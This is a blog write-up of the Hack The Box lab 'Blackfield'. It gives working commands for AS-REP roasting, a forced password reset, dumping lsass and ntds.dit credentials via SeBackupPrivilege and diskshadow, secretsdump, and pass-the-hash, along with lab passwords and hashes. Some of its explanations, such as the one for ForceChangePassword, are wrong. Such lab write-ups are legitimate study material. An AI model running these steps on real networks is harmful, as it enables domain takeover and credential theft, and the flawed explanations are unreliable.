Persecure : my learning archive

HTB : Blackfield

Network Enumeration

To begin our exploration of the network, let’s initiate an nmap scan in order to identify all open ports.

SMB Enumeration

Anonymous/guest session with SMBmap.

Anonymous/guest session with crackmapexec smb

Found a list of potential usernames. Let’s extract the names with a python script and try to find users without Kerberos pre-authentication.

Use this script here.

import re

input_file = 'input.txt'
output_file = 'output.txt'

with open(input_file, 'r') as f_in:
    text = f_in.read()

pattern = r'[A-Z][A-Za-z]*(?=\s+D\s+0)' # matches a word consisting of capital and lowercase letters that precedes ' D 0' sequence

matches = re.findall(pattern, text) # find all matches in the text

with open(output_file, 'w') as f_out:
    for match in matches:
        f_out.write(match + '\n') # writes each match to a separate line in the output file

Looks like we cant find anything.

I decided to try using another method to find for SID of users.

lookupsid.py is a Python script in Impacket that can be used to retrieve the unique Security Identifier (SID) of a user or group on a remote Windows system by querying its Security Account Manager (SAM) database.

impacket-lookupsid anonymous@10.129.246.57 | tee userlist.txt

The parse the users into a text file.

grep SidTypeUser userlist.txt | awk '{print $2}' | cut -d "\" -f2 > users2.txt

Now let’s try it again.

Impacket GetNPUsers.py is a tool that allows attackers to perform a type of password spraying attack against Active Directory environments. It enables the querying of ASReproastable accounts from the Key Distribution Center. All that is required to query these accounts is a valid set of saved usernames.

impacket-GetNPUsers -dc-ip 10.129.246.57 -usersfile users2.txt -no-pass BLACKFIELD.local/

looks like we got a hash.

Now let’s crack it with hashcat.

#00^BlackKnight

We can view the SMB shares for the support user.

After some time enumerating the SMB shares I’m unable to find any more clues. I decided to try using bloodhound remotely. Bloodhound.py can be used remotely to analyze and query data in an Active Directory environment

bloodhound-python -c all -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.129.94.69

Once the JSON files are extracted, upload it bloodhound and select the support node.

In the node info tab there will be an option to view “Outbound Object Control” and “First Degree Object Control”

In BloodHound, outbound object control refers to a user or group’s ability to modify or control objects in other domains or organizational units. BloodHound can identify users or groups with this capability, which can help identify security risks in an organization’s Active Directory environment.

First-degree object control in BloodHound means a user or group can directly modify or control objects within their own domain or OU in Active Directory. BloodHound uses this information to identify security risks and privileged users in an organization’s Active Directory environment.

We are able to ForceChangePassword of the audit2020 user.

“ForceChangePassword” is a security feature in Microsoft Active Directory that requires users to change their password upon their next login or when their account is reset. It helps enforce password expiration policies and improve security by ensuring users regularly update their passwords.

Found a tutorial on how to force change password remotely.

https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword

net rpc password audit2020 -U BLACKFIELD.local/support%#00^BlackKnight -S 10.129.94.99

Once the password is change the audit2020 user has access to the forensic folder.

In the forencis share we can find a lsass.zip file in the memory_analysis folder.

Unzip the file and we can use pypykatz to dump hashes.

PyPyKatz is a Python library that helps extract passwords and other sensitive data from Windows systems, making it useful for security professionals and incident responders.

pypykatz lsa minidump lsass.DMP

we find the svc_backup NT hash.

** We did find the hash for the administrator user and DC01$

9658d1d1dcd9250115e2205d9f48400d

7f1e4ff8c6a8e6b6fcae2d9c0572cd62

b624dc83a27cc29da11d9bf25efea796

Let’s check if we can use pass the hash method to gain a shell.

Initial shell

We get a shell.

We can find the user flag in desktop.

Looks like we can try to get privilege escalation with SeBackupPrivilege.

SeBackupPrivilege is a security privilege in Windows that allows a user or process to back up files and directories on the system, even if they do not have explicit permissions to access those files. It is typically assigned to administrative-level accounts and backup software. It is necessary for backup software to function properly.


Privilege escalation

Use the following commands to set up the exploit.

SeBackupPrivilege 

Make the diskshadow.txt file:
   
set context persistent nowriters
set metadata C:\tmp\example.cabs
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
   

   
mkdir C:\tmp
   
upload diskshadow.txt
   
diskshadow.exe /s c:\tmp\diskshadow.txt
   
(** Check the script output you might need to add repeated letters to the end of the words **)
   

   
Download the dlls from here.
   
upload SeBackupPrivilegeUtils.dll
   
upload SeBackupPrivilegeCmdLets.dll
   
import-module .\SeBackupPrivilegeUtils.dll
   
import-module .\SeBackupPrivilegeCmdLets.dll
   
copy-filesebackupprivilege w:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
   
reg save HKLM\SYSTEM c:\tmp\system.hive
   
download ntds.dit
   
download system

Once you get the ntds.dit and system.hive file transfer it to your local machine. **You might need to use impacket-smbserver to transfer.

We can now use secretsdump to dump out the hashes.

impacket-secretsdump -system system.hive -ntds ntds.dit LOCAL > hashes.txt

Once we get the administrator hash we can use get a shell with pass the hash.

We can find the root flag in the desktop.

Create a website or blog at WordPress.com